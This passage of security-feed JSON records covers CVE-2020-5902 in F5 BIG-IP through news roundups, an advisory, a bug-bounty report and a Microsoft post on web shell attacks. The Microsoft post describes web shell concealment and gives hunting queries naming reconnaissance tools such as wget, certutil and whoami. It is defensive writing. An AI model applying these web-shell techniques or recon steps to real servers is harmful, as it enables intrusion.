Waydev**](<https://www.zdnet.com/article/hackers-stole-github-and-gitlab-oauth-tokens-from-git-analytics-firm-waydev/#ftag=RSSbaffb68>)\n\n_Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers' work output by analyzing Git-based codebases. Earlier this month, the company disclosed a security breach, saying that hackers broke into its platform and stole GitHub and GitLab OAuth tokens from its internal database._\n\n[**Application Security 101**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/application-security-101>)\n\n_As the world currently grapples with the disruption brought about by the coronavirus pandemic, the need for digital transformation has become not only more apparent but also more urgent. Applications now play an integral role, with many businesses and users relying on a wide range of applications for work, education, entertainment, retail, and other uses._\n\n[**Vermont Taxpayers Warned of Data Leak Over the Past Three Years**](<https://threatpost.com/vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/157856/>)\n\n_The Vermont Department of Taxes may have been exposing taxpayer data that could be used in credential scams for more than three years due to a vulnerability in its online tax filing system. A notice posted on the department\u2019s website warned taxpayers who filed a Property Transfer Tax return through the department\u2019s online filing site between Feb. 1, 2017, and July 2, 2020, may have had their personal information leaked._\n\n[**Guidelines Related to Security in Smart Factories Part 6: MITRE ATT&CK**](<https://www.trendmicro.com/us/iot-security/news/6036/Guidelines_Related_to_Security_in_Smart_Factories_Part_6_MITRE_ATT_CK>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Thus far, part one through part five have explained IEC62443, the NIST CSF, part of the P800 series, and CIS Controls. In part six, Trend Micro explains MITRE ATT&CK, although not a guideline, it is a knowledge base in which offensive and defensive technologies in cyber-attacks are clearly organized._\n\n[**If You Own One of These 45 Netgear Devices, Replace It: Firm Won't Patch Vulnerable Gear Despite Live Proof-of-Concept Code**](<https://www.theregister.com/2020/07/30/netgear_abandons_45_routers_vuln_patching/>)\n\n_Netgear has decided not to patch more than 40 home routers to plug a remote code execution vulnerability \u2013 despite security researchers having published proof-of-concept exploit code. The vulnerability was revealed publicly in June by Trend Micro's Zero Day Initiative (ZDI)._\n\n[**Online Dating Websites Lure Japanese Customers to Scams**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/online-dating-websites-lure-japanese-customers-to-scams>)\n\n_In May, Trend Micro observed a sudden increase in traffic for online dating websites primarily targeting Japanese customers. After analyzing and tracking these numbers, we found that these dating scam campaigns attract potential victims by using different website domains that have similar screen page layouts. By the end of the transactions, the fraudsters steal money from victims without the subscribers receiving any of the advertised results._\n\n[**ESG Findings on Trend Micro Cloud-Powered XDR Drives Monumental Business Value**](<https://blog.trendmicro.com/esg-findings-xdr/>)\n\n_Trend Micro\u2019s cloud-powered XDR and Managed XDR offerings optimize threat detection and response across all critical vectors. In a recent survey commissioned by Trend Micro and conducted by ESG, organizations surveyed experience faster detection and less alert fatigue as a result of intelligently using data from all their security controls (including those covering endpoints, email, servers, cloud workloads and networks)._\n\nHow does your organization manage threat detection and response? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years](<https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-07-31T12:30:21", "type": "trendmicroblog", "title": "This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-31T12:30:21", "id": "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "href": "https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-10T15:54:49", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/03/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. Also, learn about a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173.\n\nRead on:\n\n[**Cloud Security is Simple, Absolutely Simple.**](<https://blog.trendmicro.com/cloud-security-is-simple/>)\n\n_\u201cCloud security is simple, absolutely simple. Stop over complicating it.\u201d This is the advice that Mark Nunnikhoven, vice president of cloud research at Trend Micro, shared to kick off his presentation at the CyberRisk Alliance Cloud Security Summit this year. Check out a recording of his talk in this blog recap to learn more._\n\n[**Order Out of Chaos: Tackling Phishing Attacks**](<https://securityboulevard.com/2020/07/order-out-of-chaos-tackling-phishing-attacks/>)\n\n_Responding to phishing attacks requires a combination of commodity tools, cutting-edge machine learning techniques and human-powered defense. That\u2019s how to create order out of chaos and beat the phishers at their own game, according to Trend Micro\u2019s Greg Young. Learn more in his recent article on phishing in Security Boulevard. _\n\n[**Beyond the Endpoint: Why Organizations are Choosing XDR for Holistic Detection and Response**](<https://blog.trendmicro.com/beyond-the-endpoint-why-organizations-are-choosing-xdr-for-holistic-detection-and-response/>)\n\n_The endpoint has long been a major focal point for attackers targeting enterprise IT environments. Yet increasingly, security teams are needing to protect data across the organization - whether it\u2019s in the cloud, on IoT devices, in email, or on-premises servers - attackers may jump from one environment to the next in multi-stage attacks and even hide between the layers. XDR solutions offer a convincing alternative to EDR and point solutions._\n\n[**15 Billion Credentials Currently Up for Grabs on Hacker Forums**](<https://threatpost.com/15-billion-credentials-currently-up-for-grabs-on-hacker-forums/157247/>)\n\n_Fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. A report released from the Digital Shadows Photon Research Team found that 100,000 separate data breaches over a 2-year period have yielded a 300% increase in stolen credentials, leaving a wealth of account details on dark-web hacker forums up for grabs._\n\n[**ISO/SAE 21434: It\u2019s Time to Put the Brakes on Connected Car Cyber-Threats**](<https://blog.trendmicro.com/iso-sae-21434-its-time-to-put-the-brakes-on-connected-car-cyber-threats/>)\n\n_Connected cars are set to grow 270% by 2022 to reach an estimated 125 million in just a few years. However, the high-performance mobile computers in connected cars can also leave them exposed to sensitive data theft and remote manipulation, which could create serious physical safety issues. This is where the ISO/SAE 21434 standard comes in and creates detailed guidance for the automotive industry to help it navigate these challenges and reduce reputational and cyber-risk._\n\n[**New Mirai Variant Expands Arsenal, Exploits CVE-2020-10173**](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/>)\n\n_Trend Micro discovered a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which were not observed as exploited by past Mirai variants. This discovery is a new addition to the Mirai variants that appeared in the past few months which include SORA, UNSTABLE, and Mukashi. _\n\n[**Microsoft Files Lawsuit to Seize Fake Domains Used in COVID-19-Themed BEC Attacks**](<https://www.securityweek.com/microsoft-files-lawsuit-seize-fake-domains-used-covid-19-themed-bec-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29>)\n\n_Microsoft has filed a lawsuit in an effort to seize control of several domains used to launch COVID-19-themed cyberattacks against the company\u2019s customers in 62 countries. The company started tracking the malicious activity in December 2019 after identifying it as a phishing scheme attempting to compromise Microsoft customer accounts and access emails, contacts, sensitive files, and other information._\n\n[**Cleaner One Pro Speeds Up Your Mac: Part 1**](<https://blog.trendmicro.com/cleaner-one-pro-speeds-up-your-mac-part-1/>)\n\n_Trend Micro Cleaner One Pro is an easy-to-use, all-in-one disk cleaning and optimization utility that can help you boost your Mac\u2019s performance. In this two-part blog series, Trend Micro outlines how you can use Cleaner One Pro to make your Mac run faster, walking you through its features. In Part 1, Trend Micro focuses on Quick Optimizer, the Main Console, and the Cleaning Tools. _\n\n[**Joker Malware Apps Once Again Bypass Google's Security to Spread via Play Store**](<https://thehackernews.com/2020/07/joker-android-mobile-virus.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29>)\n\n_Cybersecurity researchers unveiled another instance of Android malware hidden under the guise of legitimate applications to stealthily subscribe unsuspecting users for premium services without their knowledge. The Joker malware has found another trick to bypass Google's Play Store protections: obfuscate the malicious DEX executable inside the application as Base64 encoded strings, which are then decoded and loaded on the compromised device._\n\n[**Malicious Chrome Extensions, Domains Used to Steal User Data**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/chrome-extensions-malicious-domains-used-to-steal-user-data>)\n\n_Google Chrome extensions and Communigal Communication Ltd. (Galcomm) domains were used in a campaign that aims to track user activity and data, according to Awake Security. In the past three months, the researchers found 111 malicious or fake Chrome extensions using Galcomm domains as their command and control infrastructure. There have been at least 32 million downloads of these malicious extensions._\n\n[**Patch Now: F5 Vulnerability with CVSS 10 Severity Score**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/patch-now-f5-vulnerability-with-cvss-10-severity-score>)\n\n_F5 Networks, a provider of networking devices and services, urges users to patch their BIG-IP networking systems as soon as possible after disclosing two vulnerabilities: CVE-2020-5902, a critical remote code execution (RCE) vulnerability found in BIG-IP device\u2019s Traffic Management User Interface (TMUI), and_ _CVE-2020-5903, a less critical vulnerability that involves cross-site scripting (XSS). F5 has now released patches for both in the vulnerabilities\u2019 respective security advisories._\n\n[**Ransomware Report: Avaddon and New Techniques Emerge, Industrial Sector Targeted**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted>)\n\n_Over the past couple of months, ransomware has remained a formidable threat as new families, techniques, and targets continue emerging at every turn. Trend Micro recently witnessed the rise of a new ransomware family called Avaddon. In this blog, Trend Micro examines techniques utilized by some ransomware variants and the industries affected by these attacks. _\n\n[**70% of Organizations Experienced a Public Cloud Security Incident in the Last Year**](<https://www.helpnetsecurity.com/2020/07/09/public-cloud-security-incident/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29>)\n\n_70% of organizations experienced a public cloud security incident in the last year \u2013 including ransomware and other malware (50%), exposed data (29%), compromised accounts (25%), and cryptojacking (17%), according to Sophos._ _Organizations running multi-cloud environments are greater than 50% more likely to suffer a cloud security incident than those running a single cloud._\n\n[**Russian Group Cosmic Lynx Launches Over 200 BEC Campaigns**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/russian-group-cosmic-lynx-launches-over-200-bec-campaigns>)\n\n_A Russian group dubbed as Cosmic Lynx initiated more than 200 Business Email Compromise (BEC) campaigns targeting hundreds of multinational companies, according to security firm Agari. Cosmic Lynx was revealed to have been launching campaigns in over 40 countries including the United States, Canada, and Australia since 2019. The average amount requested from the targets is at US $1.27 million._\n\n[**Guidelines Related to Security in Smart Factories Part 3: NIST Cyber Security Framework**](<https://www.trendmicro.com/us/iot-security/news/5979/Guidelines_Related_to_Security_in_Smart_Factories_Part_3_NIST_Cyber_Security_Framework>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Part three dives into the NIST Cyber Security Framework (CSF), which is issued by US National Institute of Standards and Technology (NIST). _\n\nHas your organization experienced a public cloud security incident over the last year? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal](<https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-07-10T12:30:22", "type": "trendmicroblog", "title": "This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-10173", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-10T12:30:22", "id": "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "href": "https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ptsecurity": [{"lastseen": "2021-10-22T10:43:24", "description": "# PT-2020-04: Arbitrary code execution in F5 Traffic Management User Interface (TMUI)\n\nF5 Traffic Management User Interface (TMUI)\n\n**Severity:**\n\nSeverity level: High \nImpact: Arbitrary code execution in F5 Traffic Management User Interface (TMUI) \nAccess Vector: Remote\n\nCVSS v3.1: Base 10 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\nCVE: CVE-2020-5902\n\n**Vulnerability description:**\n\nThe vulnerability allows unauthorized remote attackers to execute malicious code on the system, obtain sensitive information, or hijack traffic, as well as use the server with the Traffic Management User Interface (TMUI) for attacks on other internal resources of the target organization.\n\n**Advisory status:**\n\n01.04.2020 - Vendor notification date \n01.07.2020 - Security advisory publication date (<https://support.f5.com/csp/article/K52145254>) \n\n**Credits:**\n\nThe vulnerability was discovered by Mikhail Klyuchnikov, Positive Technologies\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-04T00:00:00", "type": "ptsecurity", "title": "PT-2020-04: Arbitrary code execution in F5 Traffic Management User Interface (TMUI)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-01-07T00:00:00", "id": "PT-2020-04", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2020-04/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2022-03-25T13:54:30", "bounty": 0.0, "description": "@remonsec reported to us a vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI), which exploited, could have led to RCE (in undisclosed pages): [CVE-2020-5902](https://support.f5.com/csp/article/K52145254)\nWe swiftly applied the fix to the F5 BIG-IP & restricted access further, which resolved the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-23T13:50:18", "type": "hackerone", "title": "8x8: F5 BIG-IP TMUI RCE - CVE-2020-5902 (\u2588\u2588.packet8.net)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-03-25T11:11:39", "id": "H1:1519841", "href": "https://hackerone.com/reports/1519841", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-02-11T17:15:02", "description": "One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we [saw last year](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>).\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig1-web-shell-encounters-trend.png)\n\n_Figure 1. Web shell encounters on servers_\n\nThe escalating prevalence of web shells may be attributed to how simple and effective they can be for attackers. A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow attackers to run commands on servers to steal data or use the server as launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization.\n\nAs web shells are increasingly more common in attacks, both commodity and targeted, we continue to monitor and investigate this trend to ensure customers are protected. In this blog, we will discuss challenges in detecting web shells, and the Microsoft technologies and investigation tools available today that organizations can use to defend against these threats. We will also share guidance for hardening networks against web shell attacks.\n\n## Web shells as entry point for attacks\n\nAttackers install web shells on servers by taking advantage of security gaps, typically vulnerabilities in web applications, in internet-facing servers. These attackers scan the internet, often using public scanning interfaces like [shodan.io](<https://www.shodan.io/>), to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities.\n\nFor example, on June 30, F5 Networks released a patch for CVE-2020-5902, a remote code execution (RCE) vulnerability in Traffic Management User Interface (TMUI). The vulnerability is a [directory traversal bug](<https://owasp.org/www-community/attacks/Path_Traversal>) with a CVSS score of 9.8 out of a possible 10. Just four days later, on July 4, exploit code was added to a Metasploit module.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig2-exploit-code.png)\n\n_Figure 2. CVE-2020-5902 __exploit code _\n\nThe following day, Microsoft researchers started seeing the exploit being used by attackers to upload a web shell to vulnerable servers. The web shell was used to run common cryptocurrency miners. In the days that followed, industry security researchers saw the exploit being broadly used to deploy web shells, with multiple variants surfacing not long after.\n\nThis incident demonstrates the importance of keeping servers up to date and hardened against web shell attacks. Web servers are frequently accessible from the internet and can be used by attackers to gain access to a network.\n\n## Web shells as persistence mechanisms\n\nOnce installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.\n\nCompromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.\n\nAnd this brings us back to the challenge of web shell detection. As we mentioned earlier, web shells can be generalized as a means of executing arbitrary attacker input by way of an implant. The first challenge is dealing with just how many ways an attacker can execute code. Web applications support a great array of languages and frameworks and, thus, provide a high degree of flexibility and compatibility that attackers take advantage of.\n\nIn addition, the volume of network traffic plus the usual noise of constant internet attacks means that targeted traffic aimed at a web server can blend right in, making detection of web shells a lot harder and requiring advanced behavior-based detections that can identify and stop malicious activities that hide in plain sight.\n\n## Challenges in detecting web shells\n\nWeb shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.\n\nAttackers combine all these options into just a couple of bytes to produce a web shell, for example:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig3-web-shell-example-300x291.png)\n\n_Figure 3. Example of web shell code_\n\nIn the example above, the only readable word in the web shell is \u201ceval\u201d, which can be easy to miss or misinterpret. When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called \u201cUpdate Google\u201d that downloads and runs code from a suspicious website should be inspected more closely.\n\nWith web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are \u201csystem\u201d and \u201ccat /etc/passwd\u201d, but they do not appear until the attacker interacts with the web shell:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig4-web-shell-example-2-1024x233.png)\n\n_Figure 4. Another example of web shell code_\n\nAnother challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution\u2014which some very simple web shells do.\n\nThese file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.\n\nFinally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.\n\nThese challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyberattacks, and we continue to improve protections. In the next section, we discuss how behavior-based detection technologies help us protect customers from web shell attacks.\n\n## How Microsoft helps defend networks against web shell attacks\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. To tackle challenges in detecting these threats, [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) uses a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Due to the nature of web shells, static analysis is not effective\u2014as we have shown, it is relatively easy to modify web shells and bypass static protections. To effectively deliver protection, Microsoft Defender for Endpoint uses multiple layers of protection through behavior inspection.\n\n[Behavior-based blocking and containment capabilities](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/behavioral-blocking-containment>), which use engines that specialize in detecting threats by analyzing behavior, monitor web-accessible directories for any new script file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process tree can yield more reliable signals and surface malicious attempts. The engine can then remediate the script, neutralizing the primary infection vector. For example, IIS instance (_w3wp.exe_) running suspicious processes such as \u2018_cmd.exe /c echo\u2019_, \u2018_certutil.exe\u2019_, or \u2018_powershell.exe\u2019_ that result in the creation of script files in web -accessible folders is a rare event and is, thus, typically a strong sign of web server compromise and web shell installation.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/a.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/b.png)\n\nMicrosoft Defender for Endpoint also detects web shell installation attempts originating from remote systems within the organization using various lateral movement methods. For example, attackers have been observed to drop web shells through Windows Remote Management (WinRM) or use existing Windows commands to transfer web shells over SMB. On the web server, these remote actions are carried by system processes, thus giving visibility into the process tree. System privilege process dropping script files is another suspicious event and provides the behavior inspection engines ways to remediate the script before the attackers can perform any malicious actions.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/c.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/d.png)\n\nBehavior-based protection also provides post-compromise defense in scenarios where attackers are already operating and running commands on web servers. Once attackers gain access to a server, one of their first steps is to understand the privilege and the environment they have access to by using built-in reconnaissance commands that are not typically used by web applications. IIS instance (_w3wp.exe_) running commands like _\u2018net\u2019_, _\u2018whoami\u2019_, _\u2018dir\u2019_, _\u2018cmd.exe\u2019_, or _\u2018query\u2019_, to name a few, is typically a strong early indicator of web shell activity.\n\nIIS servers have built-in management tools used by administrators to perform various maintenance tasks. These platforms surface various PowerShell cmdlets that can expose critical information to the attackers. IIS instances (_w3wp.exe_) that host various web-facing client services such as Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP) accessing the management platform or executing below cmdlets is a suspicious activity and signifies a hands-on-keyboard attack. The behavior engine monitors execution of such cmdlets and the responsible process trees, for example:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/e.png)\n\nWith its behavior-based blocking and containment capabilities, Microsoft Defender for Endpoint can identify and stop behavior associated with web shell attacks. It raises alerts for these detections, enabling security operations teams to use the rich investigation tools in Microsoft Defender for Endpoint to perform additional investigation and hunting for related or similar threats.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig5-Microsoft-Defender-alert-web-shell-1a.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig5-Microsoft-Defender-alert-web-shell-2.png)\n\n_Figure 5. Microsoft Defender for Endpoint alerts for behaviors related to web shell attacks_\n\nMicrosoft 365 Defender and Microsoft Defender for Endpoint customers can also run advanced hunting queries to proactively hunt for web shell attacks:\n\nLook for suspicious process that IIS worker process (w3wp.exe), Apache HTTP server processes (_httpd.exe_, _visualsvnserver.exe_), etc. do not typically initiate (e.g., _cmd.exe_ and _powershell.exe_)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_any(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessCommandLine contains 'tomcat'\n | where FileName != \"csc.exe\" // exclude csharp compiler\n | where FileName != \"php-cgi.exe\" //exclude php group, fast cgi\n | where FileName != \"vbc.exe\" //exclude Visual Basic Command Line Compiler\n | summarize by FileName\n\nLook for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: "arp", "certutil", "cmd", "echo", "ipconfig", "gpresult", "hostname", "net", "netstat", "nltest", "nslookup", "ping", "powershell", "psexec", "qwinsta", "route", "systeminfo", "tasklist", "wget", "whoami", "wmic", etc.)\n \n \n DeviceProcessEvents\n | where InitiatingProcessParentFileName in~(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessParentFileName startswith \"tomcat\"\n | where InitiatingProcessFileName in~(\"powershell.exe\",\"powershell_ise.exe\",\"cmd.exe\")\n | where FileName != 'conhost.exe'\n\n## Hardening servers against web shells\n\nA single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as _cmd.exe_, _powershell.exe_, and _cscript.exe_. As with most attack vectors, prevention is critical.\n\nOrganizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.\n * Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.\n * Enable antivirus protection on web servers. [Turn on cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.\n\nWeb shells and the attacks that they enable are a multi-faceted threat that require comprehensive visibility across domains and platforms. [Microsoft 365 Defender](<https://aka.ms/m365d>) correlates threat data from endpoints, email and data, identities, and apps to coordinate cross-domain protection. [Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\n_Detection and Response Team (DART)_\n\n_Microsoft Defender Security Research Team_\n\n \n\nThe post [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-11T17:00:05", "type": "mssecure", "title": "Web shell attacks continue to rise", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 